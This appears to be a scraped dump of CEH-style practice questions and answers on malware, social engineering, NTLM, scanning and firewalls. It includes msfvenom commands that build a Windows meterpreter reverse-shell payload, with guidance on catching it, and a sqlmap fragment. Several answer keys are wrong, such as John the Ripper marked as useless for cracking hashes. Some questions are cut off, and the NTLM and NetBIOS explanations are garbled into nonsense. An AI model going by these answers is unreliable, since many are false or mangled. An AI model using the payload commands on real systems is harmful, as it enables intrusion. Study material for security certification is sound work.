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Oct 18, 2023
Don, a student, came across a gaming app in a third-party app store and Installed it. Subsequently, all the legitimate apps in his smartphone were replaced by
deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after Installing the app. What is the attack performed on
Don in the above scenario?
A. SMS phishing attack
B. SIM card attack
C. Agent Smith attack
D. Clickjacking
Answer: C
Agent Smith Attack
Agent Smith attacks are carried out by luring victims into downloading and installing malicious apps designed and published by attackers in the form of games,
photo editors, or other attractive tools from third-party app stores such as 9Apps. Once the user has installed the app, the core malicious code inside the
application infects or replaces the legitimate apps in the victim's mobile device C&C commands. The deceptive application replaces legitimate apps such as
WhatsApp, SHAREit, and MX Player with similar infected versions. The application sometimes also appears to be an authentic Google product such as Google
Updater or Themes. The attacker then produces a massive volume of irrelevant and fraudulent advertisements on the victim's device through the infected app for
financial gain. Attackers exploit these apps to steal critical information such as personal information, credentials, and bank details, from the victim's mobile device
through C&C commands.
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You are tasked to perform a penetration test. While you are performing information gathering, you
find an employee list in Google. You find the receptionist’s email, and you send her an email
changing the source email to her boss’s email (boss@company). In this email, you ask for a pdf with
information. She reads your email and sends back a pdf with links. You exchange the pdf links with
your malicious links (these links contain malware) and send back the modified pdf, saying that the
links don’t work. She reads your email, opens the links, and her machine gets infected. You now have
access to the company network. What testing method did you use?
A. Social engineering
B. Piggybacking
C. Tailgating
D. Eavesdropping
Answer: A
Social engineering is the term used for a broad range of malicious activities accomplished through
human interactions. It uses psychological manipulation to trick users into making security mistakes or
giving away sensitive information.
Social engineering attacks typically involve some form of psychological manipulation, fooling
otherwise unsuspecting users or employees into handing over confidential or sensitive data.
Commonly, social engineering involves email or other communication that invokes urgency, fear, or
similar emotions in the victim, leading the victim to promptly reveal sensitive information, click a
malicious link, or open a malicious file. Because social engineering involves a human element,
preventing these attacks can be tricky for enterprises.
Incorrect answers:
Tailgating and Piggybacking are the same thing
Tailgating, sometimes referred to as piggybacking, is a physical security breach in which an
unauthorized person follows an authorized individual to enter a secured premise.
Tailgating provides a simple social engineering-based way around many security mechanisms one
would think of as secure. Even retina scanners don't help if an employee holds the door for an
unknown person behind them out of misguided courtesy.
People who might tailgate include disgruntled former employees, thieves, vandals, mischief-makers,
and issues with employees or the company. Any of these can disrupt business, cause damage, create
unexpected costs, and lead to further safety issues.
Eavesdropping https://en.wikipedia.org/wiki/Eavesdropping
Eavesdropping is the act of secretly or stealthily listening to the private conversation or
communications of others without their consent in order to gather information. Since the beginning
of the digital age, the term has also come to hold great significance in the world of cybersecurity.
The question does not specify at what level and how this attack is used. An attacker can eavesdrop
on a conversation or use special software and obtain information on the network. There are many
options, but this is not important because the correct answer is clearly not related to information
Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server
A. Overloading Port Address Translation
B. Dynamic Port Address Translation
C. Dynamic Network Address Translation
D. Static Network Address Translation
Answer: D
What is the proper response for a NULL scan if the port is open?
F. No response
Answer: F
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug
affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?
A. Public
B. Private
C. Shared
D. Root
Answer: B
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John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the loT devices connected in the target network that are using default
credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of loT devices
and detect whether they are using the default, factory-set credentials. What is the tool employed by John in the above scenario?
A. loTSeeker
B. loT Inspector
C. AT&T loT Platform
D. Azure loT Central
Answer: A
Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he
uses MIB. which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by
entering the IP address and Lseries.mlb or by entering the DNS library name and Lseries.mlb. He is currently retrieving information from an MIB that contains
object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario?
Answer: A
DHCP.MIB: Monitors network traffic between DHCP servers and remote hosts HOSTMIB.MIB: Monitors and manages host resources
LNMIB2.MIB: Contains object types for workstation and server services MIBJI.MIB: Manages TCP/IP-based Internet using a simple architecture and system
WINS.MIB: For the Windows Internet Name Service (WINS)
which of the following protocols can be used to secure an LDAP service against anonymous queries?
Answer: D
In a Windows network, nongovernmental organization (New Technology) local area network Manager (NTLM) could be a suite of Microsoft security protocols
supposed to produce authentication, integrity, and confidentiality to users.NTLM is that the successor to the authentication protocol in Microsoft local area network
Manager (LANMAN), Associate in Nursing older Microsoft product. The NTLM protocol suite is enforced in an exceedingly Security Support supplier, which mixes
the local area network Manager authentication protocol, NTLMv1, NTLMv2 and NTLM2 Session protocols in an exceedingly single package. whether or not these
protocols area unit used or will be used on a system is ruled by cluster Policy settings, that totally different|completely different} versions of Windows have different
default settings. NTLM passwords area unit thought-about weak as a result of they will be brute-forced very simply with fashionable hardware.
NTLM could be a challenge-response authentication protocol that uses 3 messages to authenticate a consumer in an exceedingly affiliation orientating setting
(connectionless is similar), and a fourth extra message if integrity is desired.
First, the consumer establishes a network path to the server and sends a NEGOTIATE_MESSAGE advertising its capabilities.
Next, the server responds with CHALLENGE_MESSAGE that is employed to determine the identity of the consumer.
Finally, the consumer responds to the challenge with Associate in Nursing AUTHENTICATE_MESSAGE.
The NTLM protocol uses one or each of 2 hashed word values, each of that are keep on the server (or domain controller), and that through a scarcity of seasoning
area unit word equivalent, that means that if you grab the hash price from the server, you’ll evidence while not knowing the particular word. the 2 area unit the lm
Hash (a DES-based operate applied to the primary fourteen chars of the word born-again to the standard eight bit laptop charset for the language), and also the nt
Hash (MD4 of the insufficient endian UTF-16 Unicode password). each hash values area unit sixteen bytes (128 bits) every.
The NTLM protocol additionally uses one among 2 a method functions, looking on the NTLM version. National Trust LanMan and NTLM version one use the DES
primarily based LanMan a method operate (LMOWF), whereas National TrustLMv2 uses the NT MD4 primarily based a method operate (NTOWF).
In the context of Windows Security, what is a 'null' user?
A. A user that has no skills
B. An account that has been suspended by the admin
C. A pseudo account that has no username and password
D. A pseudo account that was created for security administration purpose
Answer: C
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST= LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST= LPORT=4444 -f exe > shell.exe
Answer: C
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Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module
and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the
examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across
the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=Y<our IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP header and the related TCP window size and obtained
the following results:
TTL: 64 Window Size: 5840
What is the OS running on the target machine?
A. Solaris OS
B. Windows OS
C. Mac OS
D. Linux OS
Answer: D
By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB
service and occasionally entered your login and password in plaintext.
Which file do you have to clean to clear the password?
A. .X session-log
B. .bashrc
C. .profile
D. .bash_history
Answer: D
File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems; stores a history of user commands entered at the
command prompt; used for viewing old commands that are executed.BASH_HISTORY files are hidden files with no filename prefix. They always use the filename
.b ash_history.NOTE: Bash is that the shell program employed by Apple Terminal.Our goal is to assist you understand what a file with a *.bash_history suffix is
and the way to open it.The Bash History file type, file format description, and Mac and Linux programs listed on this page are individually researched and verified
by the FileInfo team. we attempt for 100% accuracy and only publish information about file formats that we’ve tested and validated.
in an attempt to increase the security of your network, you Implement a solution that will help keep your wireless network undiscoverable and accessible only to
those that know It. How do you accomplish this?
A. Delete the wireless network
B. Remove all passwords
C. Lock all users
D. Disable SSID broadcasting
Answer: D
The SSID (service set identifier) is the name of your wireless network. SSID broadcast is how your router transmits this name to surrounding devices. Its primary
function is to make your network visible and easily accessible. Most routers broadcast their SSIDs automatically. To disable or enable SSID broadcast, you need to
change your router’s settings.
Disabling SSID broadcast will make your Wi-FI network name invisible to other users. However, this only hides the name, not the network itself. You cannot
disguise the router's activity, so hackers can still attack it.
With your network invisible to wireless devices, connecting becomes a bit more complicated. Just giving a Wi-FI password to your guests is no longer enough.
They have to configure their settings manually by including the network name, security mode, and other relevant info.
Disabling SSID might be a small step towards online security, but by no means should it be your final one. Before considering it as a security measure, consider
the following aspects:
- Disabling SSID broadcast will not hide your network completely
Disabling SSID broadcast only hides the network name, not the fact that it exists. Your router constantly transmits so-called beacon frames to announce the
presence of a wireless network. They contain essential information about the network and help the device connect.
- Third-party software can easily trace a hidden network
Programs such as NetStumbler or Kismet can easily locate hidden networks. You can try using them yourself to see how easy it is to find available networks –
hidden or not.
- You might attract unwanted attention.
Disabling your SSID broadcast could also raise suspicion. Most of us assume that when somebody hides something, they have a reason to do so. Thus, some
hackers might be attracted to your network.
Password cracking programs reverse the hashing process to recover passwords. (True/False.)
A. True
B. False
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Answer: B
Allen, a professional pen tester, was hired by xpertTech solutWns to perform an attack simulation on the organization's network resources. To perform the attack,
he took advantage of the NetBIOS API and targeted the NetBIOS service. B/enumerating NetBIOS, he found that port 139 was open and could see the resources
that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration.
identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?
A. <1B>
B. <00>
C. <03>
D. <20>
E. C<03>Windows Messenger administrationCourier administration is an organization based framework notice Windows administration by Microsoft that was
remembered for some prior forms of Microsoft Windows.This resigned innovation, despite the fact that it has a comparable name, isn’t connected in any capacity
to the later, Internet-based Microsoft Messenger administration for texting or to Windows Messenger and Windows Live Messenger (earlier named MSN
Messenger) customer programming.The Messenger Service was initially intended for use by framework managers to tell Windows clients about their networks.[1] It
has been utilized malevolently to introduce spring up commercials to clients over the Internet (by utilizing mass-informing frameworks which sent an ideal message
to a predetermined scope of IP addresses). Despite the fact that Windows XP incorporates a firewall, it isn’t empowered naturall
F. Along these lines, numerous clients got such message
G. Because of this maltreatment, the Messenger Service has been debilitated as a matter of course in Windows XP Service Pack 2.
Answer: E
During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound
HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?
A. Circuit
B. Stateful
C. Application
D. Packet Filtering
Answer: C
Internet Relay Chat (IRC) is an application layer protocol that facilitates communication in text. The chat process works on a client/server networking model. IRC
clients are computer programs that users can install on their system or web-based applications running either locally in the browser or on a third-party server.
These clients communicate with chat servers to transfer messages to other clients.
IRC is a plaintext protocol that is officially assigned port 194, according to IANA. However, running the service on this port requires running it with root-level
permissions, which is inadvisable. As a result, the well-known port for IRC is 6667, a high-number port that does not require elevated privileges. However, an IRC
server can also be configured to run on other ports as well.
You can't tell if an IRC server is designed to be malicious solely based on port number. Still, if you see an IRC server running on port a WKP such as 80, 8080, 53,
443, it's almost always going to be malicious; the only real reason for IRCD to be running on port 80 is to try to evade firewalls.
An application firewall is a form of firewall that controls input/output or system calls of an application or service. It operates by monitoring and blocking
communications based on a configured policy, generally with predefined rule sets to choose from. The application firewall can control communications up to the
OSI model's application layer, which is the highest operating layer, and where it gets its name. The two primary categories of application firewalls are networkbased
and host-based.
Application layer filtering operates at a higher level than traditional security appliances. This allows packet decisions to be made based on more than just
source/destination IP Addresses or ports. It can also use information spanning across multiple connections for any given host.
Network-based application firewalls
Network-based application firewalls operate at the application layer of a TCP/IP stack. They can understand certain applications and protocols such as File
Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a
non-standard port or detect if an allowed protocol is being abused.
Host-based application firewalls
A host-based application firewall monitors application system calls or other general system communication. This gives more granularity and control but is limited to
only protecting the host it is running on. Control is applied by filtering on a per-process basis. Generally, prompts are used to define rules for processes that have
not yet received a connection. Further filtering can be done by examining the process ID of the owner of the data packets. Many host-based application firewalls
are combined or used in conjunction with a packet filter.
Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes
using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or Managers. The time
a hacker spends performing research to locate this information about a company is known as?
A. Exploration
B. Investigation
C. Reconnaissance
D. Enumeration
Answer: C
Mary found a high vulnerability during a vulnerability scan and notified her server team. After analysis, they sent her proof that a fix to that issue had already been
applied. The vulnerability that Marry found is called what?
A. False-negative
B. False-positive
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C. Brute force attack
D. Backdoor
Answer: B
False positives are mislabeled security alerts, indicating there is a threat when in actuality, there isn’t. These false/non-malicious alerts (SIEM events) increase
noise for already over-worked security teams and can include software bugs, poorly written software, or unrecognized network traffic.
False negatives are uncaught cyber threats — overlooked by security tooling because they’re dormant, highly sophisticated (i.e. file-less or capable of lateral
movement) or the security infrastructure in place lacks the technological ability to detect these attacks.
Tony is a penetration tester tasked with performing a penetration test. After gaining initial access to a target system, he finds a list of hashed passwords.
Which of the following tools would not be useful for cracking the hashed passwords?
A. John the Ripper
B. Hashcat
C. netcat
D. THC-Hydra
Answer: A
Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities.
What will you call these issues?
A. False positives
B. True negatives
C. True positives
D. False negatives
Answer: A
False Positives occur when a scanner, Web Application Firewall (WAF), or Intrusion Prevention System (IPS) flags a security vulnerability that you do not have. A
false negative is the opposite of a false positive, telling you that you don't have a vulnerability when, in fact, you do.
A false positive is like a false alarm; your house alarm goes off, but there is no burglar. In web application security, a false positive is when a web application
security scanner indicates that there is a vulnerability on your website, such as SQL Injection, when, in reality, there is not. Web security experts and penetration
testers use automated web application security scanners to ease the penetration testing process. These tools help them ensure that all web application attack
surfaces are correctly tested in a reasonable amount of time. But many false positives tend to break down this process. If the first 20 variants are false, the
penetration tester assumes that all the others are false positives and ignore the rest. By doing so, there is a good chance that real web application vulnerabilities
will be left undetected.
When checking for false positives, you want to ensure that they are indeed false. By nature, we humans tend to start ignoring false positives rather quickly. For
example, suppose a web application security scanner detects 100 SQL Injection vulnerabilities. If the first 20 variants are false positives, the penetration tester
assumes that all the others are false positives and ignore all the rest. By doing so, there are chances that real web application vulnerabilities are left undetected.
This is why it is crucial to check every vulnerability and deal with each false positive separately to ensure false positives.
Which of the following tools can be used to perform a zone transfer?
A. NSLookup
B. Finger
C. Dig
D. Sam Spade
E. Host
F. Netcat
G. Neotrace
Answer: ACDE
Vlady works in a fishing company where the majority of the employees have very little understanding of IT let alone IT Security. Several information security issues
that Vlady often found includes, employees sharing password, writing his/her password on a post it note and stick it to his/her desk, leaving the computer unlocked,
didn’t log out from emails or other social media accounts, and etc.
After discussing with his boss, Vlady decided to make some changes to improve the security environment in his company. The first thing that Vlady wanted to do is
to make the employees understand the importance of keeping confidential information, such as password, a secret and they should not share it with other persons.
Which of the following steps should be the first thing that Vlady should do to make the employees in his company understand to importance of keeping confidential
information a secret?
A. Warning to those who write password on a post it note and put it on his/her desk
B. Developing a strict information security policy
C. Information security awareness training
D. Conducting a one to one discussion with the other employees about the importance of information security
Answer: A
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Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique.
Boney first obtains a valid session ID by logging into a service and later feeds the same session 10 to the target employee. The session ID links the target
employee to Boneys account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details
entered in a form are linked to Boneys account. What is the attack performed by Boney in the above scenario?
A. Session donation attack
B. Session fixation attack
C. Forbidden attack
D. CRIME attack
Answer: A
In a session donation attack, the attacker donates their own session ID to the target user. In this
attack, the attacker first obtains a valid session ID by logging into a service and later feeds the same session ID to the target user. This session ID links a target
user to the attacker's account page without disclosing any information to the victim. When the target user clicks on the link and enters the details (username,
password, payment details, etc.) in a form, the entered
details are linked to the attacker's account. To initiate this attack, the attacker can send their session ID using techniques such as cross-site cooking, an MITM
attack, and session fixation. A session donation attack involves the following steps.
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches.
If these switches' ARP cache is successfully flooded, what will be the result?
A. The switches will drop into hub mode if the ARP cache is successfully flooded.
B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.
C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.
D. The switches will route all traffic to the broadcast address created collisions.
Answer: A
What is the following command used for?
&forumaction=search" -dbs
A. Creating backdoors using SQL injection
B. A Enumerating the databases in the DBMS for the URL
C. Retrieving SQL statements being executed on the database
D. Searching database statements at the IP address given
Answer: A
Mary found a high vulnerability during a vulnerability scan and notified her server team. After analysis, they sent her proof that a fix to that issue had already been
applied. The vulnerability that Marry found is called what?
A. False-negative
B. False-positive
C. Brute force attack
D. Backdoor
Answer: B
False positives are mislabeled security alerts, indicating there is a threat when in actuality, there isn’t. These false/non-malicious alerts (SIEM events) increase
noise for already over-worked security teams and can include software bugs, poorly written software, or unrecognized network traffic.
False negatives are uncaught cyber threats — overlooked by security tooling because they’re dormant, highly sophisticated (i.e. file-less or capable of lateral
movement) or the security infrastructure in place lacks the technological ability to detect these attacks.
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